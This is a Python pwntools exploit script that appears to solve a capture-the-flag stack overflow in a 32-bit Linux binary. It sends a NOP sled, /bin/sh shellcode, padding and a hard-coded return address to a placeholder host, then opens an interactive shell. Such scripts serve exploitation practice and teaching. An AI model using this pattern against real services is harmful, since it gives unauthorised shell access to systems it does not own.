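from pwn import *

# CTF exploit script (pwntools, Python 2 print syntax) for a stack buffer
# overflow in a 32-bit Linux binary: after two banner lines it sends a
# NOP sled, shellcode, padding and a hard-coded return address, then
# hands the socket over to an interactive session.

# Setup context: the binary is treated as 32-bit x86 on Linux.
context(arch='i386', os='linux')
context.log_level = 'debug'

# The gist leaves host and port unfilled; keep them as labelled
# placeholders so the script parses.
HOST = "<host>"  # placeholder, not a real value
PORT = 0         # placeholder, not a real value

# Open connection to the process
# Remote
sock = remote(HOST, PORT)
# Local
# sock = process('./q5.v2')
# pid = pwnlib.util.proc.pidof(sock)
# print pid[0]
# pwnlib.util.proc.wait_for_debugger(pid[0])

# Ignore the first two lines of output before sending anything.
sock.recvline()
sock.recvline()

print "Sending shellcode"
# EBP is at 0xffffd318 so we want to return to somewhere around 0xffffd2ce +- 40 (where the buffer starts)
# The flaw should look something like this: 74 bytes of data, 4 bytes for the saved EBP of the previous stack frame, and finally the next 4 bytes will be the return address
# Send shell code: [n-bytes NOP sled][i-bytes of shell code][k-bytes of data (minimum of 4)][4 bytes return address]
# Attempt to have ctftools build us the shell code to use -- should be 82 bytes long
nop_sled = "\x90" * 40
payload = asm(shellcraft.i386.linux.sh())
data = "\x00" * 16
# NOTE: this address is only meaningful for the stack layout observed in
# the comment above; it is not derived at runtime.
ret_address = "\xe2\xd2\xff\xff"
exploit = nop_sled + payload + data + ret_address

# The original printed len(payload) under the label "Exploit length",
# which reported the shellcode size rather than the full buffer; report both.
print "Shellcode length", len(payload)
print "Exploit length", len(exploit)

# Send the exploit
sock.send(exploit)
# Prompt for interactive shell
sock.interactive()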